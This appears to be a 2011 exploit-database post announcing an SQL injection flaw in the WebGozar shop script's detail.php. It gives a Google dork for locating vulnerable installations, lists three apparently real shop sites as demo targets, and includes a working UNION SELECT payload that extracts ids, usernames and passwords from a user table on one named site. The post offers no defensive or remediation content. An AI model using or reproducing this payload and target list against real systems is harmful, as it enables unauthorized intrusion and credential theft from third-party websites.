# Exploit Title:WebGozar(detail.php)Sql-i Vulnerability
# Date: 26/6/2011
# Author: Angel Injection & Noor Al-Iraqia
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link:www.webgozar.com
# Version: n/a
# Category:: webapps
# Google dork:"Powered by WebGozar" inurl:detail.php
# Tested on: Windows Xp Sp3
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
http://www.mshop.ir/detail.php?id=1158'
http://www.iran-new.com/shop/detail.php?id=647'
http://top30d.ir/detail.php?id=925'
exploit
http://target/detail.php?id=1 Injection Here
demo
http://www.iran-new.com/shop/detail.php?id=-647+union+select+1,2,3,concat(id,0x3a,user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Greetz To :1337day Team
Thanks to all the people of Iraq And Club Hack Team
